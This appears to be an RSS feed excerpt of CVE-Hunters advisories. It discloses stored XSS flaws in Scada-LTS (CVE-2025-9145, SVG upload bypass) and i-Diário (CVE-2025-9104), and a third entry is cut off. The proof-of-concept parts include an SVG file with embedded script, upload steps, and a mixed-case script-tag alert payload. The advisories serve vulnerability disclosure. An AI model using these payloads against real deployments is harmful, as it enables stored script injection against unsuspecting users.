    
      <item>
        <title>CVE-2025-9145</title>
        <link>https://www.cvehunters.com/p/cve-2025-9145/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9145/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9145-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass&amp;#34;&amp;gt;CVE-2025-9145: Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to upload malicious files into the &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt; parameter. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9145-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass&amp;#34;&amp;gt;CVE-2025-9145: Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to upload malicious files into the &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt; parameter. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Save the payload in the &amp;lt;code&amp;gt;xss.svg&amp;lt;/code&amp;gt; file.&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;After, access the &amp;lt;code&amp;gt;views.shtm&amp;lt;/code&amp;gt; page, and click on &amp;lt;code&amp;gt;&amp;#34;computer &#43;&amp;#34;&amp;lt;/code&amp;gt; to add a new &amp;lt;code&amp;gt;&amp;#34;view&amp;#34;&amp;lt;/code&amp;gt;, click on &amp;lt;code&amp;gt;&amp;#34;Escolher arquivo&amp;#34;&amp;lt;/code&amp;gt; button to choose the malicious file, then click on &amp;lt;code&amp;gt;&amp;#34;Upload image&amp;#34;&amp;lt;/code&amp;gt; button to upload the file, after that, click on &amp;lt;code&amp;gt;&amp;#34;Save&amp;#34;&amp;lt;/code&amp;gt; button. Access the file by the trigger page.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;http:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;www&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;w3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;org&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;none&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;This&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;is&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;an&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;POC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVEHUNTERS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9145/image.png&amp;#34;
	width=&amp;#34;635&amp;#34;
	height=&amp;#34;266&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9145/image_hu_19b8b3d221202a9e.png 480w, /p/cve-2025-9145/image_hu_ce8f7117cded72f5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9104</title>
        <link>https://www.cvehunters.com/p/cve-2025-9104/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9104/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9104-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aulas-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9104: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9104-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aulas-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9104: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9104&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/planos-de-aulas-por-disciplina/(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objeto de Conhecimento&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ScRipT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ScRipT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9104/image.png&amp;#34;
	width=&amp;#34;967&amp;#34;
	height=&amp;#34;843&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9104/image_hu_3d05674558fa6ba6.png 480w, /p/cve-2025-9104/image_hu_776361e30dbe0dfd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;275px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9105</title>
        <link>https://www.cvehunters.com/p/cve-2025-9105/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9105/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9105-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-9105: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
